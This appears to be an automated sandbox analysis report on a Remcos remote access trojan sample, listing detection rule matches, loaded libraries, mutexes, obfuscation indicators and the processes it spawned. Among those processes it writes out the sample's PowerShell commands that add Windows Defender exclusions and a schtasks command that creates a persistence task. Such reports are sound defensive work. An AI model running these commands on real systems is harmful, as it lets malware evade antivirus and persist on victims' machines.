Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: PEbZthAqV9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: myTuDsvNcebev.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, id.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, id.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.cs | Security API names: _0020.SetAccessControl
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.cs | Security API names: _0020.AddAccessRule
Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, q09dpiu5WulYHThgxc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.cs | Security API names: _0020.SetAccessControl
Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.cs | Security API names: _0020.AddAccessRule
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, q09dpiu5WulYHThgxc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@27/16@1/2
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | File created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Mutant created: \Sessions\1\BaseNamedObjects\RKUAsnF
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-Y7J88P
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | File created: C:\Users\user\AppData\Local\Temp\tmp53D2.tmp
Source: PEbZthAqV9.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PEbZthAqV9.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | File read: C:\Users\user\Desktop\PEbZthAqV9.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\PEbZthAqV9.exe "C:\Users\user\Desktop\PEbZthAqV9.exe"
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Users\user\Desktop\PEbZthAqV9.exe "C:\Users\user\Desktop\PEbZthAqV9.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: PEbZthAqV9.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PEbZthAqV9.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: PEbZthAqV9.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: JzWg.pdbSHA256 | source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr
Source: Binary string: JzWg.pdb | source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.dr

Data Obfuscation

Source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, id.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: PEbZthAqV9.exe, LogInGUI.cs | .Net Code: InitializeComponent contains xor as well as GetObject
Source: myTuDsvNcebev.exe.0.dr, LogInGUI.cs | .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.cs | .Net Code: v39pIehFEK System.Reflection.Assembly.Load(byte[])
Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.cs | .Net Code: v39pIehFEK System.Reflection.Assembly.Load(byte[])
Source: PEbZthAqV9.exe | Static PE information: 0x8B52382E [Tue Jan 26 11:42:38 2044 UTC]
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041A8DA
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_00C1F362 push esp; iretd 0_2_00C1F3F1
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_02D30580 pushfd ; iretd 0_2_02D3058D
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_0754894D push esp; retf 0_2_0754894E
Source: C:\Users\user\Desktop\PEbZthAqV9.exe | Code function: 0_2_0AD62A7A push eax; ret 0_2_0AD62A81
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 9_2_011EF3F0 push esp; iretd 9_2_011EF3F1
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004000D8 push es; iretd 18_2_004000D9
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0040008C push es; iretd 18_2_0040008D
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_004542E6 push ecx; ret 18_2_004542F9
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_0045B4FD push esi; ret 18_2_0045B506
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00432BD6 push ecx; ret 18_2_00432BE9
Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe | Code function: 18_2_00454C08 push eax; ret 18_2_00454C26
